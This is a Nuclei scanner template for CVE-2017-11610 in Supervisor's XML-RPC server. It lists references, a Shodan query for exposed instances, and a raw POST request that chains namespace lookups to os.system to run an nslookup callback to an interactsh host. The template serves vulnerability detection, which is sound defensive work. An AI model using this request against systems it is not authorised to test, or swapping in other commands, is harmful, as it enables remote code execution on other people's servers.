nuclei-templates/cves/2017/CVE-2017-11610.yaml

59 lines
1.9 KiB
YAML

id: CVE-2017-11610
info:
name: XML-RPC Server - Remote Code Execution
author: notnotnotveg
severity: high
description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisor namespace lookups.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
- https://nvd.nist.gov/vuln/detail/CVE-2017-11610
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXGWOJNSWWK2TTWQJZJUP66FLFIWDMBQ/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DTPDZV4ZRICDYAYZVUHSYZAYDLRMG2IM/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2017-11610
cwe-id: CWE-276
metadata:
shodan-query: http.title:"Supervisor Status"
tags: oast,xmlrpc,msf,cve,cve2017,rce,supervisor
requests:
- raw:
- |
POST /RPC2 HTTP/1.1
Host: {{Hostname}}
Accept: text/xml
Content-type: text/xml
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>nslookup {{interactsh-url}}</string>
</param>
</params>
</methodCall>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: header
words:
- "text/xml"
- type: word
part: body
words:
- "<methodResponse>"
- "<int>"
condition: and
# Enhanced by mp on 2022/06/09